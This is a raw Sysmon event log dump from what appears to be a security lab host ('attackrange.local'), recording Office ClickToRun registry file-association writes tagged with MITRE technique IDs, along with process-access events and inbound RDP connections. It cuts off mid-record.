13241300x800000000000000075484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.577{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\oqyfile\shell\Edit_Query_in_Notepad\command\(Default)%%SystemRoot%%\System32\notepad.exe "%%1" 13241300x800000000000000075483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.577{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\ViewProtected\ddeexec\(Default)(Empty) 13241300x800000000000000075482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vp "%%1" 13241300x800000000000000075481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\Printto\ddeexec\(Default)(Empty) 13241300x800000000000000075480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" /j "%%2" 13241300x800000000000000075479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 13241300x800000000000000075477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\OpenAsReadOnly\ddeexec\(Default)(Empty) 13241300x800000000000000075476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /h "%%1" 13241300x800000000000000075475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\New\ddeexec\(Default)(Empty) 10341000x800000000000000075472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.545{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE5-607E-200D-00000000BB01}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "%%1" 13241300x800000000000000075470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\Edit\ddeexec\(Default)(Empty) 13241300x800000000000000075469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.OpenDocumentSpreadsheet.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vu "%%1" 10341000x800000000000000075468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.530{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE5-607E-200D-00000000BB01}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.530{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE5-607E-200D-00000000BB01}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\iqyfile\shell\open\ddeexec\(Default)(Empty) 13241300x800000000000000075465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\iqyfile\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE "%%1" 13241300x800000000000000075464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.514{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\iqyfile\shell\Edit_Query_in_Notepad\command\(Default)%%SystemRoot%%\System32\notepad.exe "%%1" 13241300x800000000000000075463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\dqyfile\shell\open\ddeexec\(Default)(Empty) 13241300x800000000000000075462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\dqyfile\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE "%%1" 13241300x800000000000000075461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\dqyfile\shell\Edit_Query_in_Notepad\command\(Default)%%SystemRoot%%\System32\notepad.exe "%%1" 13241300x800000000000000075460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.CSV\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.CSV\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 13241300x800000000000000075458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.CSV\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.483{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.CSV\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 354300x800000000000000075456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.189{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-40740-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000075455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.083{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60316-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000075454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:39.285{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57540-false10.0.1.12-8000- 13241300x800000000000000075453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.436{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ms-access\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 10341000x800000000000000075452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.436{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE5-607E-1F0D-00000000BB01}6184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\printto\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\printto\ddeexec\ifexec\(Default)[] 10341000x800000000000000075449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.420{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE5-607E-1F0D-00000000BB01}6184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.420{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE5-607E-1F0D-00000000BB01}6184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\printto\ddeexec\(Default)[PrintTo "%%1","%%2","%%3","%%4"] 13241300x800000000000000075446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\printto\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP /SHELLSYSTEM [PrintTo "%%1","%%2","%%3","%%4"][ShellQuit] 13241300x800000000000000075445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\print\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\print\ddeexec\ifexec\(Default)[] 13241300x800000000000000075443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.420{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\print\ddeexec\(Default)[PrintTo "%%1"] 13241300x800000000000000075442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\print\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP /SHELLSYSTEM [PrintTo "%%1"][ShellQuit] 13241300x800000000000000075441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\preview\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\preview\ddeexec\ifexec\(Default)[] 13241300x800000000000000075439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\preview\ddeexec\(Default)[SetForeground][OpenTable "%%1", 2] 13241300x800000000000000075438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\preview\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenTable "%%1", 2] 13241300x800000000000000075437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.405{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\open\ddeexec\(Default)[SetForeground][OpenTable "%%1"] 13241300x800000000000000075434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP /SHELLSYSTEM [OpenTable "%%1"] 13241300x800000000000000075433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\design\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\design\ddeexec\ifexec\(Default)[] 13241300x800000000000000075431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\design\ddeexec\(Default)[SetForeground][OpenTable "%%1", 1] 13241300x800000000000000075430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Table.1\shell\design\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenTable "%%1", 1] 13241300x800000000000000075429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.StoredProcedure.1\shell\open\ddeexec\topic\(Default)ShellSystem 10341000x800000000000000075428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.373{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE5-607E-1E0D-00000000BB01}5660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.StoredProcedure.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.StoredProcedure.1\shell\open\ddeexec\(Default)[SetForeground][OpenStoredProcedure "%%1"] 13241300x800000000000000075425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.StoredProcedure.1\shell\open\command\(Default)"C:\Program Files\Microsoft 